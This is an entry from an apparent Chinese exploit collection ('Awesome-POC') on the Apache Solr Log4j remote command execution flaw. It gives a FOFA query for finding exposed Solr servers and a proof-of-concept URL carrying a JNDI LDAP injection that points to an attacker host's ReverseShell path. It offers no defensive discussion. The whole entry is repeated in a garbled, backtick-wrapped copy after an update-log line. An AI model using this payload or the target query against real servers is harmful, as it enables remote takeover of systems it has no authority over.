Awesome-POC/Web服务器漏洞/Apache Solr Log4j组件远程命令执行漏洞.md

# Apache Solr Log4j组件 远程命令执行漏洞

## 漏洞描述

Apache Solr Log4j组件 远程命令执行漏洞，详情略

## 漏洞影响

```
Apache Solr
```

## FOFA

```
app="APACHE-Solr"
```

## 漏洞复现

登录页面

![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251622273.png)

验证POC

```
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json
```

![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251622876.png)
更新漏洞库：Web服务器漏洞/ 2022-05-25 16:51:48 +08:00			`# Apache Solr Log4j组件远程命令执行漏洞`

			`## 漏洞描述`

			`Apache Solr Log4j组件远程命令执行漏洞，详情略`

			`## 漏洞影响`

			```
			`Apache Solr`
			```

			`## FOFA`

			```
			`app="APACHE-Solr"`
			```

			`## 漏洞复现`

			`登录页面`

			`![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251622273.png)`

			`验证POC`

			```
			`/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/87}&wt=json`
			```

			`![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251622876.png)`